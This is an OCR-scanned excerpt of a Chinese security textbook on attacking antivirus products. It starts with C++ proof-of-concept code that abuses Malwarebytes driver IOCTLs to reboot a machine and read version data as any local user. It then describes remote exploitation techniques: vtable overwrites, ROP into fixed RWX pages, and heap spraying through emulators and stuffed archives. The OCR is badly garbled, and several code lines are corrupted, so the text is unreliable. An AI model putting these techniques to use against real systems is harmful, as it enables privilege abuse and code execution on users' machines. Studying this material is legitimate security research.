B HandleloctlGetDriverVersion = 0x22245E, 

B set g sys buf, 2A550 = 0x222461, 

B PrintKernelReport = 0x222465, 

B free g sys buf 2a550 = 0x2224609, 








ESomgmgm mmm om Omm om mom om om XSom Xm oXmom 








struct mb driver version t 


( 





int major; 
int minor; 
int revision; 
int other; 


class CMBSwiss 
{ 
private: 
HANDLE device handle; 
public: 
bool open device(void); 
void reboot (void); 
bool get version(char *buf, size t size); 
bool overwrite file(const wchar t *filel, const wchar t *file2); 
m 





#endif 
最 后 ， 调 用 DeviceIoCcontrol 的 mb_swiss.cpp 的 代码 如 下 : 


#include "mb swiss.h" 


bool base open device(const wchar t *uni name, HANDLE *device handle) 


{ 
HANDLE hFile = CreateFileW(uni name, 


GENERIC READ | GENERIC WRITE, 
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0, 0, OPEN EXISTING, O0, 0); 
if ( hFile -- INVALID HANDLE VALUE ) 
printf("[!] Error: %d\n", GetLastError()); 


*device handle - hFile; 





return hFile !- INVALID HANDLE VALUE; 
} 
Jj tt eue cue cur eue Leto ge meu eU Degtuiueeie 
bool CMBSwiss::open device(void) 
{ 
return base open device(MBSWISS DEVICE NAME, &device handle); 
} 
Ju TIC EDLHEHEHEEBEHEIEPIEREEENEIEIEIEBIECINSESEINEIEMEEEIEIE EE 
void CMBSwiss::reboot (void) 
{ 
DWORD bytes; 
DWORD buf; 
if ( !DeviceloControl(device handle, MB HalRebootRoutine, &buf, sizeof(buf), 
&buf, sizeof(buf), &bytes, 0) ) 
t 
printf ("[!] Operation failed, %d\n", GetLastError ()); 
} 
} 
Jg a a E E 
bool CMBSwiss::get_version(char *buf, size_t size) 
{ 
DWORD bytes; 
mb driver version t version = (0); 
if ( IDevicerIoControl(device handle, MB HandleIloctlGetDriverVersion, 
&version, sizeof(version), &version, sizeof(version), &bytes, 0) ) 
{ 
printf("[!] Error getting version $dWMn", GetLastError()); 
return false; 
j 
 snprintf s(buf, size, size, "$d.$d.$d.$d", version.major, 


version.minor, version.other, version.revision); 
return true; 


} 

要 记 住 本 例 中 使 用 的 IOCTL 代 码 是 由 Malwarebytes 的 驱动 处 理 的 ， 而 这 些 功 能 本 不 应 该 提供 
给 任意 本 地 用 户 使 用 , 但 遗憾 的 是 , 对 于 Malwarebytes 的 用 户 来 说 , 这些 功 能 却 可 以 被 任意 使 用 。 
在 本 书 编写 的 时 候 ， 该 漏洞 仍然 是 一 个 未 公开 的 零 日 漏洞 。 但 是 ,在 本 书 出 版 之 前 ,本 漏洞 会 被 
“负责 任 ” 地 公开 。 比 本 书 中 演示 的 重启 机 器 更 完整 、 支 持 更 多 功能 的 漏洞 利用 攻击 PoC， 可 以 
在 如 下 地 址 下 载 : https://github.com/joxeankoret/tahh/malwarebytes。 















































注意 ”你 可 能 会 注意 到 ， 在 上 一 段 中 ,我 为 “负责 任 ” 三 个 字 加 了 引号 。 我 强烈 反对 “负责 任 
公开 ”的 传统 定义 。 负 责任 公开 通常 被 认为 是 一 位 安全 研究 者 或 一 个 安全 研究 团队 ， 发 
现 了 一 个 或 多 个 漏洞 并 将 相关 发 现 报 送 厂商 ; 厂商 修复 漏洞 ( 可 能 需要 数 天 或 在 一 些 极 
端 案例 中 需要 几 年 ); 最 后 ， 如 果 厂 商 同 意 ， 厂商 和 研究 者 联合 公开 针对 相关 漏洞 的 安全 
建议 。 但 是 ， 负 责任 公开 意味 着 给 年 收入 数 百 万 美元 、 却 从 来 没有 对 其 产品 做 过 任何 审 
计 的 厂商 免费 进行 安全 审计 。 对 于 安全 研究 者 来 说 ， 这 意味 着 为 写 出 不 负责 任 的 代码 、 
将 用 户 置 于 危险 境地 的 厂商 免费 做 苦力 。 通 常 来 说 ， 即 便 是 在 相关 漏洞 已 经 被 修复 的 情 
况 下 ， 安 全 研究 者 公开 漏洞 也 将 面临 被 厂商 起 诉 的 风险 。 在 我 和 其 他 研究 者 身上 发 生 过 
很 多 次 类 似 的 事情 。 


14.5 总结 


本 地 攻击 技术 是 一 种 在 接触 到 本 地 目标 机 器 后 ,利用 产品 或 相关 模块 的 漏洞 进行 攻击 的 技术 。 

本 章 阐 释 了 多 种 可 能 导致 在 本 地 被 利用 的 漏洞 。 

口 内 存 玻 坏 漏 洞 “ 这 意味 着 内 存 存 取 违 例 产 生 的 前 溃 ， 可 以 最 终 导致 任意 内 存 读 / 写 ， 或 信 

A itti o 

O 错误 权限 分 配 ”这 类 漏洞 的 产生 是 因为 对 系统 对 象 、 进 程 线 程 和 文件 进行 了 错误 的 设置 ， 
或 根本 没有 设置 相关 权限 或 访问 控制 列表 ( ACL )。 比 如 ， 一 个 ACL 为 null 的 SYSTEM 进 
程 就 为 低 权 限 的 进程 开放 了 攻击 的 大 门 。 

口 逻辑 漏洞 “这 类 漏洞 通常 是 由 逻辑 类 编程 缺陷 或 设计 缺陷 导致 的 。 这 类 漏洞 一 般 较 难 发 
现 ， 但 是 一 经 发 现 并 被 加 以 利用 ， 就 会 带 来 十 分 巨大 的 危害 。 在 一 些 案例 中 ， 由 于 这 类 
漏洞 同 产品 中 的 其 他 模块 深度 整合 交织 ， 如 果 不 对 产品 进行 重大 改动 ， 是 无 法 轻松 修复 
漏洞 的 。 

要 挖掘 可 在 本 地 利用 攻击 的 漏洞 非常 简单 ， 如 下 所 示 : 

(1) 安装 对 应 软件 ， 重 启 机 器 ， 观 察 所 有 被 安装 的 模块 ; 

(2) 通过 复查 已 安装 的 服务 、 进 程 和 内 核 驱 动 的 权限 分 配 以 及 每 个 对 象 、 文 件 等 的 权限 , 来 分 

析 对 应 软件 的 本 地 攻击 面 ; 

(3) 逆向 分 析 内 核 驱 动 和 服务 ， 来 挖掘 软件 中 的 后 门 以 及 可 被 传送 给 驱动 的 IOCTL。 

下 面 简 要 描述 上 述 各 种 类 型 漏洞 的 利用 。 

a 如 果 出 现 内 存 破坏 漏洞 ， 攻 击 者 可 以 直接 修改 内 存 中 的 内 容 ， 重 写 安全 token 或 全 局 变 
量 的 重要 信息 。 想 象 一 个 名 为 g_bIsAgmin 的 全 局 变量 。 由 于 一 个 漏洞 利用 攻击 程序 利 
用 了 一 个 内 存 破坏 漏洞 ， 将 变量 设置 为 1， 软 件 将 允许 管理 函数 执行 ( 比如 ， 禁 用 反 病 
毒 软件 )。 

Q 分 配 有 错误 权限 以 及 非法 特权 、 权 限 分 配 和 ACL 的 反 病毒 服 务 将 让 没有 特权 的 程序 能 与 
特权 应 用 交互 ， 并 以 更 高 权限 运行 。 比 如 ， 攻 击 者 可 以 在 权限 管理 过 于 松散 的 特权 进程 
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中 远程 创建 一 个 线程 ， 来 执行 恶意 代码 。 如 果 内 核 驱动 中 发 现 同 样 的 漏洞 ， 将 允许 任意 
用 户 与 之 交互 , 并 接触 未 有 文档 公开 说 明 但 是 强力 的 函数 。14.4 节 中 介绍 了 许多 如 何 发 现 
并 利用 逻辑 漏洞 的 有 用 信息 。 
a 逻辑 漏洞 可 能 会 表现 为 后 门 、 隐 藏 功 能 ， 或 错误 的 权限 控制 检查 。 后 门 和 隐藏 功能 通常 
可 以 通过 逆向 分 析 发 现 。 比 如 ，Panda Global Protection 反 病毒 软件 2013 及 其 以 下 版 本 的 某 
一 内 核 驱动 ， 如 果 接 收 到 一 条 特殊 指令 ， 将 能 够 禁用 反 病 毒 软件 (通过 IOCTL 代 码 )。 
下 一 章 将 会 探讨 远程 攻击 ， 攻 击 者 将 能 够 远程 发 起 攻击 ， 以 获取 本 地 接触 目标 机 器 的 权限 。 
当 谈 到 一 个 从 网 络 外 部 到 内 部 的 多 阶段 攻击 的 时 候 , 记 住 本 地 和 远程 漏洞 利用 技术 是 相互 补充 的 。 



































远程 漏洞 

















当 攻 击 者 无 法 接触 目标 计算 机 时 ， 可 以 利用 远程 漏洞 技术 来 对 一 款 产 品 或 产品 组 件 开展 攻击 。 

反 病 毒 软件 可 以 被 远程 攻击 , 不 过 要 实现 这 一 过 程 有 点 困难 。 本 章 将 阐释 为 何 远 程 利用 反 病 
毒 软件 的 漏洞 开展 攻击 要 比 本 地 攻击 复杂 得 多 。 此 外 , 本章 还 会 阐释 如 何 针对 反 病 毒 软件 编写 漏 
洞 远 程 利用 攻击 脚本 ， 并 提供 了 许多 让 漏洞 利用 过 程 更 容易 的 有 用 建议 。 


15.1 实施 客户 端 漏洞 利用 攻击 


针对 客户 端 应 用 开展 攻击 时 , 攻击 者 会 通过 解析 由 邮件 或 驱动 器 传递 的 恶意 代码 触发 并 利用 
应 用 的 漏洞 。 在 这 个 意义 上 讲 ， 远 程 利 用 反 病 毒 软 件 的 漏洞 开展 攻击 与 之 相 类 似 。 尽 管 可 以 通过 
一 些 网 络 服务 和 管理 控制 台 实 现 服务 器 端的 漏洞 利用 攻击 , 但 是 这 类 产品 一 直 可 用 的 最 大 攻击 面 
其 实 是 客户 端 部 分 。 本 节 将 重点 介绍 反 病毒 软件 客户 端 模块 的 漏洞 的 远程 利用 。 


15.1.1 利用 沙 盒 的 缺陷 


大 多 数 反 病毒 产品 仍然 饱 受 缺少 合适 安全 防护 措施 的 困扰 , 这 就 导致 攻击 者 能 轻易 地 对 产品 
发 起 攻击 ,就 像 攻 击 音 乐 播放 絮 或 图 像 浏览 器 这 样 老 旧 的 客户 端 应 用 一 样 简 单 。 事实 上 , 利用 现 
有 主流 反 病 毒 产 品 中 的 漏洞 , 要 比 利 用 有 安全 意识 的 客户 端 应 用 中 的 漏洞 容易 得 多 。 比 如 ， 相 对 
于 针对 Adobe Acrobat Reader, Google Chrome 或 最 新 版 本 的 Internet Explorer 或 Microsoft Office, fl 
对 没有 采取 任何 措施 防止 自身 被 攻破 的 反 病 毒 软件 来 编写 漏洞 利用 程序 , 难度 要 小 得 多 。 这 是 因 
为 反 病 毒 软件 负责 确保 只 有 传 入 的 受信 内 容 才 能 在 沙 盒 中 运行 , 而 前 面 提 到 的 多 款 桌 面 应 用 则 引 
人 了 相关 沙 盒 保 护 机 制 。 

沙 盒 是 一 种 防止 进程 执行 某 些 特权 行为 的 有 限制 的 执行 环境 。 通常 , 沙 盒 进 程 会 采取 类 似 的 
设计 一 一 父 进 程 ， 也 被 称 作 Broker 进 程 以 普通 用 户 权 限 执 行 。Windows 系 统 中 ， 父 进程 会 控 
制 一 个 或 多 个 以 不 同 完整 性 级 别 运 行 的 子 进程 ; 而 类 Unix 系 统 中 则 为 不 同 用 户 身 份 运行 或 以 有 限 
功能 方式 运行 的 子 进程 。 如 果子 进程 要 进行 一 些 敏感 操作 和 特权 操作 ， 比 如 执行 操作 系统 命令 或 
在 特定 临时 目录 外 创建 文件 ， 就 需要 同 父 进 程 即 Broker 进 程 进 行 通信 。 如 果 Broker 进 程 认 为 某 一 
子 进程 的 请 求 合 法 ,， 则 会 代 其 完成 相关 操作 。 但 是 , 大 多 数 反 病 毒 产 品 中 仍 没 有 引入 类 似 的 沙 盒 
机 制 。 如 果 我 们 去 读 一 读 反 病 毒 软件 的 广告 ， 然 后 研究 一 下 相关 产品 ， 就 会 发 现 反 病毒 三 商 提 及 
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的 “ 沙 盒 运行 ”实际 上 仅仅 是 指 将 未 知 的 程序 或 代码 放 和 半 受 控 的 环境 中 运行 。 对 用 户 来 说 不 幸 
的 是 ， 除 了 一 些 例 外 ， 大 多 数 反 病毒 产品 的 安全 性 远 不 及 浏览 器 和 文档 阅读 器 。 

尽管 我 们 已 经 清楚 了 为 何 利 用 反 病 毒 产品 中 的 漏洞 与 利用 其 他 客户 端 应 用 中 的 漏洞 进行 攻 
击 无 异 , 但 是 要 编写 针对 一 款 反 病毒 软件 的 漏洞 的 利用 程序 ， 还 有 不 少 困难 等 待 解决 。 其实 , 这 
类 困难 不 是 反 病 毒 产品 本 身 设 置 的 ,而 是 操作 系统 或 编译 骨 漏 洞 缓 释 技术 带 来 的 。 开 始 编写 针对 
反 病 毒 软件 漏洞 的 利用 程序 的 一 种 办 法 是 ， 利 用 反 病 毒 产品 在 应 用 ASLR、DEP 和 RWX 内 存 页 过 
程 中 常会 出 现 的 错误 。 关 于 这 点 我 们 将 会 在 下 一 节 中 进行 讨论 。 


15.1.2 ”利用 ASLR、DEP 和 位 于 固定 地 址 的 RWX 页 面 漏洞 


以 下 是 一 些 常 见 的 细微 错误 ， 如 果 不 纠正 就 会 导致 漏洞 和 安全 问题 。 

a 没有 对 产品 中 的 一 个 或 多 个 模块 ( 甚至 是 内 核 层面 的 模块 ) 局 用 空间 格局 随机 化 (ASLR ) 

保护 措施 ， 导 致 ASLR 保 护 失效 。 

口 将 一 个 没有 启用 ASLR 的 库 文 件 全 系统 注入 , 导致 整个 系统 内 所 有 进程 的 ASLR 保 护 失效 。 

a 出 于 要 在 堆 中 执行 代码 的 目的 ， 故 意 禁 用 了 数据 执行 保护 (DEP )。 

O 查找 位 于 固定 地 址 的 RWX 内 存 页 面 。 对 于 漏洞 利用 程序 的 编写 者 来 说 ， 找 到 位 于 固定 地 
址 的 、 有 RWX 属 性 的 内 存 页 面 无 异 于 找到 了 金 矿 。 

从 安全 角度 来 看 ， 上 述 做 法 无 疑 不 妥 。 这 类 错误 对 某 些 人 来 说 是 坏 消息 ,但 对 有 一 些 人 ( 漏 
洞 利用 程序 编写 者 ) 来 说 却 是 好 消息 。 事实 上 确实 是 这 样 的 , 我 在 针对 文件 格式 漏洞 编写 的 大 部 
分 漏洞 利用 程序 中 都 利用 了 这 类 “特性 ”: 在 堆 中 执行 代码 ( DEP ) 或 直接 使 用 一 些 大 小 不 等 的 、 
位 于 一 个 或 多 个 没有 启用 ASLR 的 库 文件 中 的 特殊 ROP payload。 

一 个 利用 了 没有 启用 ASLR 库 文件 漏洞 的 利用 程序 通常 来 说 十 分 稳定 ， 这 是 因为 库 文件 提供 
了 一 系列 固定 的 地 址 , 这 样 漏洞 利用 程序 就 可 以 依 此 来 找到 所 有 利用 过 程 中 需要 用 到 的 ROP 组 件 
To 但 是 ,对 于 某 些 反 病 毒 软件 来 说 ,情况 可 能 还 要 乐观 。 比 如 ,我 发 现 某 款 反 病 毒 软件 会 在 固 
定 内 存 地 址 处 创建 带 有 RWX 属 性 的 内 存 页 面 ， 这 让 我 们 在 当前 反 病毒 软件 的 上 下 文 环境 中 执行 
可 控 的 代码 容易 了 许多 。 

为 了 解释 这 个 漏洞 的 利用 场景 ， 首 先 假设 我 们 在 一 款 反 病 毒 软件 中 发 现 了 一 个 堆 滋 出 漏洞 ， 
可 以 利用 该 漏洞 写 一 个 之 后 会 被 间接 引用 的 指针 值 ， 接 着 将 其 解释 为 虚 表 ( VTable ) 中 的 指针 。 
以 下 是 反 汇编 结果 列表 : 

MOV EAX, [ECX] ; Memory at ECX is controllable 

CALL [EAX+8] ; So, we directly control this call 

本 例 中 ， 由 于 存在 内 存 破 坏 漏 洞 ， 我 们 可 以 覆盖 一 个 C++ 对 象 的 VTable， 该 地 址 通常 直接 就 
在 对 象 实例 处 。 由 于 我 们 可 以 控制 Ecx 指 向 的 内 容 , 也 就 可 以 控制 位 于 EAX+8 的 最 终 间 接 调 用 值 。 

在 本 例 中 ， 如 果 要 实现 远程 漏洞 利用 ,我们 仍然 需要 弄 清楚 跳 转 执行 后 的 位 置 。 由 于 存在 
ASLR， 要 搞 清楚 并 不 容易 。 不 过 ， 我 们 可 以 试 试 以 下 方法 。 

(1) 借助 任意 未 启用 ASLR 的 模块 ， 我 们 可 以 跳 转 执行 一 系列 ROP 组 件 ， 进 行 攻击 的 第 二 步 : 
准备 执行 shellcode。 
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(2) ROP 组 件 将 shellcode 复 制 至 反 病 毒 软件 创建 的 固定 RWX 内 存 页 面 内 ， 供 我 们 编写 的 漏洞 
利用 程序 使 用 。 
(3) ROP 组 件 复制 完整 个 shellcode 后 ,我 们 可 以 跳 转 进 入 相关 RWX 内 存 页 面 ， 并 继续 正常 执 
行 相关 代码 。 
(4) 搞定 ! 至 此 完成 了 整个 攻击 过 程 。 
如 上 述 例子 介绍 的 那样 ,如 果 反 病毒 软件 犯 了 这 样 的 典型 错误 , 那么 相关 利用 过 程 就 变 得 十 
分 简单 了 。 即 便 仅 仅 出 现 了 前 面 介绍 的 四 个 漏洞 类 型 的 其 中 之 一 , 也 意味 着 我 们 将 面 对 的 情况 会 
在 “利用 起 来 很 简单 ”和 “鬼才 知道 如 何 利 用 ”之 间 进 行 切 换 。 
假如 和 当今 的 大 多 数 软件 一 样 , 启用 了 DEP, 没有 创建 RWX 内 存 页 面 , 而 且 所 有 模块 都 启用 
了 ASLR。 在 这 种 情况 下 ， 情 况 会 大 不 相同 ， 根 据 操作 系统 和 架构 的 不 同 ,漏洞 的 利用 过 程 会 变 
得 十 分 困难 : 
口 启用 了 DEP 以 后 ， 不 会 从 数据 页 面 中 执行 代码 ; 
口 启用 了 ASLR 后 ， 除 非 知 道 gadget 的 地 址 ， 否 则 没有 ROP 会 知道 。 
在 大 多 数 情况 下 ， 当 今 绝 大 部 分 编译 器 实现 的 漏洞 利用 防护 措施 的 效果 已 经 很 不 错 了 : 
O 安全 Cookie 可 以 有 效 对 抗 栈 缓冲 区 溢出 ; 
a 控制 流 保护 (CFG ) 可 以 有 效 对 抗 UAF 漏 洞 ; 
O SafeSEH 防 护 可 以 有 效 对 抗 异 常 处 理 函 数 指针 履 盖 漏洞 。 









































提示 “你 可 能 会 感到 疑惑 : 为 什么 本 身 做 安全 防护 的 反 病 毒 软件 会 犯 这 样 的 低级 错误 ?在 一 些 案 
例 中 ， 出 于 性 能 因素 的 考虑 ,会 出 现 ASLR 相 关 的 ， 以 及 带 有 RWX 属 性 的 地 址 固定 的 内 存 
页 错误 。 其 至 有 一 家 反 病 毒 厂商 直接 向 我 展示 了 启用 ASLR 和 不 启用 ASLR 的 模块 对 比 。 


15.1.3 ”编写 复杂 的 payload 


通常 来 说 , 反 病毒 产品 的 漏洞 利用 程序 必须 针对 目标 操作 系统 、 架 构 其 至 最 终日 标 机 髓 进行 
专门 创建 。 在 这 类 情况 下 , 我 们 需要 确定 如 何 创建 复杂 的 payload, 而 不 仅仅 是 创建 将 地 址 或 一 系 
列 地 址 外 加 shellcode 写 死 的 漏洞 利用 程序 ， 和 否则 在 真实 的 目标 机 器 上 可 能 无 法 生效 。 针 对 客户 端 
应 用 创建 复杂 的 攻击 payload， 通 常 意味 着 要 使 用 到 JavaScript， 比 如 当 遇 到 浏览 器 或 类 似 Adobe 
Acrobat Reader 这 样 的 程序 时 。 当 遇 到 类 似 Microsoft Office 这 样 的 办 公 软 件 时 , 我 们 可 能 需要 尝试 
UN — Adobe Flash 进 行 JIT spray; 或 者 散人 一 系列 BMP 图 片 ， 用 bitmap 数 据 填充 之 后 要 使 用 的 
一 大 块 内 存 ， 以 此 来 进行 堆 喷 。 

但 反 病毒 引擎 中 不 存在 JavaScript 解 释 器 ( 或许 有 ? 稍 后 将 会 详细 探讨 这 个 问题 )。 这 样 就 没 
有 办 法 能 入 并 运行 Flash 应 用 了 ， 也 无 法 将 图 片 放 和 人 Word 文档 然后 希望 反 病 毒 引擎 能 将 所 有 图 片 
RANET o putt, NER ESI E R payload? 接 下 来 将 会 介绍 一 些 反 病 毒 软件 中 可 
供 编写 复杂 payload 的 特性 。 相关 过 程 并 不 会 太 容易 , 可 能 没有 像 编 写 针 对 浏览 器 或 Acrobat Reader 
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的 漏洞 利用 程序 那样 有 很 多 技术 可 供 使 用 。 

1. 借助 模拟 器 

这 无 疑 是 解决 问题 的 首选 答案 。 除 了 ClamAV 这 个 典型 以 外 ， 几 乎 所 有 现存 的 反 病 毒 引 擎 都 
包含 至 少 一 款 模拟 器 , 即 Pntel x86 模 拟 器 .模拟 器 可 以 帮助 我 们 实现 恶意 操作 吗 ? 答案 可 以 为 “是 ” 
也 可 以 为 “ 否 ”。 反 病毒 产品 中 的 模拟 器 通常 会 受 超时 设置 、 内 存 限 制 其 至 是 循环 次 数 的 限制 。 

不 幸 的 是 ,这 就 意味 着 我 们 并 不 能 通过 创建 PE 文件 、ELF 文 件 或 MachO 文 件 ， 强制 让 反 病 毒 
模拟 器 进行 模拟 ， 并 填充 1 GB 或 2 GB 的 内 存 ， 在 触发 真实 漏洞 之 前 来 进行 堆 喷 。 不 过 另 一 方面 ， 
模拟 器 可 以 被 识别 定位 , 因此 我 们 可 以 有 针对 性 地 编写 最 终 的 payload, 也 可 以 在 模拟 需 模拟 恶意 
代码 过 程 中 , 触发 模拟 器 的 内 存 泄漏 问题 , 这样 某 一 大 小 的 内 存在 样本 模拟 执行 结束 后 就 不 会 被 
释放 。 模 拟 需 很 可 能 是 反 病 毒 产品 中 最 支离破碎 的 部 分 , 也 是 经 常 被 更 新 的 模块 之 一 ,这 就 意味 
着 每 次 更 新 以 后 都 有 可 能 出 现 许 多 新 的 漏洞 。 

要 注意 并 不 是 所 有 恶意 软件 样本 都 会 被 传递 给 模拟 器 处 理 。 因 此 ， 在 我 们 攻击 模拟 器 之 前 ， 
首先 要 确保 某 一 样本 能 进入 模拟 器 运行 。 如 何 才能 强制 让 反 病 毒 软 件 模拟 一 个 样本 呢 ? 这 里 就 不 
需要 你 进行 研究 了 ， 我 进行 了 以 下 操作 : 

(1) 逆向 分 析 反 病毒 引擎 找到 进行 扫描 操作 的 位 置 ; 

(2) 在 扫描 需 调 用 模拟 器 的 函数 之 处 设置 断 点 ; 

(3) 使 用 反 病 毒 软 件 扫描 一 个 大 的 恶意 软件 样本 集 ; 

(4) 等 待 ， 直 到 触发 断 点 。 

这 里 使 用 的 技巧 是 让 反 病 毒 软件 扫描 大 量 不 同 的 样本 , 进而 找到 可 以 触发 进入 模拟 需 分 析 的 
那 一 个 。 一旦 断 点 (上 面 第 二 步 中 设置 的 ) 被 触发 ， 就 意味 着 我 们 找到 了 一 个 可 以 触发 模拟 器 的 
样本 。 通 常 来 说 ,会 触发 反 病 毒 软 件 进 行 模拟 需 分 析 的 样本 是 十 分 复杂 、 难 以 静态 解密 的 EXE 加 
密 器 或 封装 需 , 因此 反 病 毒 工程 师 就 想 出 了 使 用 模拟 器 来 进行 解密 的 点 子 (这 是 一 个 十 分 巧妙 的 
主意 : 让 机 需 完 成 )。 找 到 能 触发 模拟 器 模拟 操作 的 Windows PE 、ELF 或 MachO 文 件 后 ， 我 们 可 
以 将 入口 点 代码 修改 成 我 们 自己 的 代码 。 瞧 ， 现 在 我 们 有 了 一 个 能 够 被 模拟 器 模拟 的 文件 样本 ， 
同时 又 有 地 方 来 写 入 生成 的 payload 或 者 造成 多 内 存 泄漏 以 便 进行 堆 喷 。 这 类 样本 是 Windows PE 
文件 的 可 能 性 要 大 于 ELF 或 MachO 文 件 。 

不 过 即便 我 们 借助 模拟 器 进行 了 堆 喷 , 或 实现 了 之 前 提 到 的 一 些 技巧 , 仍然 有 一 些 问题 和 限 
制 待 我 们 去 克服 : 反 病 毒 模 拟 器 通常 对 可 以 模拟 的 指令 、 人 允许 调用 的 API 数 量 ， 以 及 可 以 使 用 的 
内 存 大 小 等 有 严格 的 限制 。 出 于 性 能 考虑 ， 反 病毒 软件 不 会 让 一 个 样本 永久 运行 在 计算 机 上 , 更 
何况 是 一 个 可 以 造成 模拟 器 内 存 泄漏 的 恶意 样本 。 比 如 ,假设 函数 NtcreateFile 传 人 了 恶意 参 
数 ， 将 会 分 配 一 块 永远 不 会 释放 的 缓冲 区 。 每 次 函数 被 调用 后 就 会 分 配 大 小 为 1 KB 的 内 存 区 块 ， 
不 过 反 病 毒 模拟 器 在 执行 函数 1000 次 后 , 就 会 拒绝 继续 执行 该 操作 。 这 样 一 来 我 们 只 分 配 了 1 MB 
的 内 存 区 块 。 如 果 在 攻击 过 程 中 你 需要 更 多 内 存 ， 就 要 用 到 下 面 介绍 的 技巧 了 。 

2. 利用 档案 文件 

类 似 TAR 或 简单 的 ZIP 这 样 的 档案 文件 内 部 通常 会 包含 很 多 其 他 的 文件 。 当 反 病 毒 软件 分 析 
档案 文件 的 时 候 ， 引 擎 会 默认 执行 如 下 操作 : 
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(D) 引 敬 会 有 限制 (最 多 向 下 扫描 五 层 般 套 文件 ) 地 分 析 档 案 文 件 中 的 全 部 子 文件 ; 

(2) 从 第 一 个 到 最 后 一 个 按 顺序 分 析 所 有 文件 。 

在 之 前 借助 函数 NtcreateFile 实 现 理 论 上 的 内 存 泄漏 的 例子 中 ,每 个 样本 会 分 配 1 MB 的 内 
存 。 如 果 我 们 发 送 给 反 病毒 软件 扫描 的 不 是 单个 Windows PE 文件 ， 而 是 100 个 被 简单 修改 过 的 样 
本 文件 呢 ? 反 病 毒 软件 会 默认 分 析 100 个 文件 ， 也 就 会 分 配 100 MB 空间 。 如 果 我 们 压缩 的 是 1000 
个 文件 ， 而 不 是 100 个 文件 ,那么 将 会 分 配 1000 MB 或 1 GB 的 内 存 。 要 实现 这 样 的 技巧 ， 我 们 只 
要 在 样本 文件 末尾 添加 一 个 字 节 或 DWORD， 这样 文件 的 校 验 散 列 值 就 会 改变 ， 反 病 毒 软件 就 无 
法 分 辨 即将 扫描 的 样本 以 前 是 否 已 经 扫描 过 了 。 此 外 ,我 们 还 要 注意 ， 由 于 文件 十 分 相似 ， 只 有 
一 个 字 节 或 一 个 DOWRD 的 差别 ， 所 以 压缩 率 会 十 分 高 ， 也 会 非常 高 效 地 创建 很 小 的 ZIP 或 7z 档 
案 文件 ， 其 内 部 又 包含 大 量 的 样本 文件 。 这 样 的 技巧 很 不 错 ， 不 是 吗 ? 

通过 上 述 技巧 分 配 了 预期 大 小 内 存 后 , 我 们 可 以 在 档案 文件 的 最 后 再 添加 一 个 触发 漏洞 的 样 
本 。 接着 就 可 以 使 用 在 目标 反 病毒 软件 中 已 被 分 配 的 内 存 了 。 这 种 针对 反 病 毒 软件 进行 堆 噶 的 方 
式 通 常 来 说 十 分 好 用 。 

3. 查找 Intel x86, AMD x86_64 和 ARM 模 拟 器 中 的 缺陷 

反 病 毒 软件 通常 会 使 用 不 止 一 款 模拟 器 。 最 常见 的 模拟 器 是 针对 Intel x86 的 ， 也 有 不 太 常 见 
的 针对 AMD x86_64 或 ARM 的 模拟 器 ， 甚 至 是 针对 Microsoft .NET 字 节 码 的 模拟 器 。 这 就 意味 着 
攻击 者 可 以 使 用 目标 反 病 毒 软件 支持 的 任意 汇编 语言 来 编写 高 级 payload。 我 们 甚至 可 以 针对 不 同 
的 架构 ， 在 不 同 的 Windows PE 文件 中 使 用 不 同 的 汇编 语言 编写 payload 的 不 同 部 分 : 借助 之 前 档 
案 文件 的 技巧 ， 我 们 可 以 向 反 病 毒 软 件 发 送 一 个 高 级 payload， 其 中 一 个 文件 使 用 Intel x86 汇 编 语 
言 编写 ， 第 二 个 文件 使 用 AMD x86_64 汇 编 语 言 实 现 , 在 最 后 一 个 文件 中 使 用 ARM 汇 编 语 言 进 行 
相关 操作 。 

你 用 如 此 复杂 的 攻击 方式 折磨 自己 的 理由 是 : 混淆 。 使 用 不 同 模拟 器 的 漏洞 利用 攻击 程序 ， 
会 让 分 析 者 难以 理解 其 实现 机 制 。 当 然 ， 聪 明 的 分 析 者 会 发 现 其 中 的 规律 并 实现 自动 化 反 混 淆 。 

4. 使 用 JavaScript、VBScript 或 ActionScript 

在 前 面 几 节 中 ， 我 排除 了 使 用 JavaScript 创 建 复杂 payload 或 进行 堆 喷 的 可 能 性 ， 并 指出 这 种 
办 法 只 能 用 于 浏览 器 和 Adobe Acrobat Reader. 但 同时 我 也 留 下 了 一 个 没有 回答 的 问题 : 反 病 毒 扫 
描 器 中 是 否 存 在 JavaScript 解 释 器 或 模拟 吉 呢 ? 答案 是 肯定 的 ， 但 要 看 具体 是 哪 一 款 反 病毒 产品 。 
通常 ， 应 用 在 Intel x86 模 拟 器 上 的 限制 同样 也 会 应 用 到 JavaScript 解 释 器 或 模拟 器 上 : 对 内 存 消耗 
有 一 系列 限制 ， 并 不 是 所 有 API 都 可 以 使 用 ; 有 超时 时 间 ; 对 循环 次 数 和 模拟 指令 的 数量 也 有 限 
制 ; 等 等 。 

和 之 前 阐释 的 针对 其 他 本 机 代码 模拟 器 编写 漏洞 利用 程序 一 样 ， 我 们 也 可 以 使 用 JavaScript 
编写 最 终 payload 来 利用 一 款 反 病毒 产品 中 的 漏洞 。 

以 下 是 使 用 JavaScript 会 比 使 用 纯 汇 编 代 码 来 编写 漏洞 利用 程序 更 佳 的 两 个 原因 : 
a 相 比 纯 汇 编 语 言 ， 使 用 JavaScript 这 样 的 高 级 语言 编写 漏洞 利用 程序 会 更 简单 ; 
O 相 比 较 PE、ELF 和 MachO 文 件 来 说 ， 模 拟 或 解释 执行 JavaScript 代 码 会 更 容易 。 
确实 , 虽然 各 个 反 病毒 产品 之 间 可 能 稍 有 差异 , 不 过 大 多 数 混淆 的 JavaScript 文 件 通常 是 由 反 
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病毒 内 核 中 的 JavaScript3| 擎 模拟 或 解释 执行 的 。 但 是 由 于 性 能 的 原因 ， 对 于 Windows PE 文件 或 
其 他 程序 文件 来 说 ， 这 种 情况 并 不 会 经 常 发 生 。 

在 某 些 反 病毒 产品 中 ， 我 们 不 仅 能 够 发 现 Intel x86、AMD64、ARM 或 JavaScript 模 拟 器 ， 还 
能 发 现 VBScript 和 ActionScript 模 拟 器 。 不 同 的 反 病 毒 内 核 或 产品 有 着 各 自 不 同 的 类 似 模 拟 需 实现 
方式 。 

强烈 推荐 使 用 JavaScript ( 如 果 可 以 的 话 还 可 以 用 VBScript ) 代替 汇编 语言 来 编写 漏洞 利用 程 
序 的 原因 是 , 可 以 更 轻松 地 针对 不 同 引擎 编写 出 不 同 的 漏洞 利用 程序 。 如 果 你 想 针 对 一 些 反 病 毒 
引擎 进行 漏洞 利用 攻击 , 而 且 发 现 相 关 引 苟 中 有 JavaScript 引 擎 , 可 以 首先 识别 反 病 毒 产 品 使 用 的 
JavaScript 引 敬 ， 然 后 针对 不 同 的 反 病毒 产品 编写 payload。 
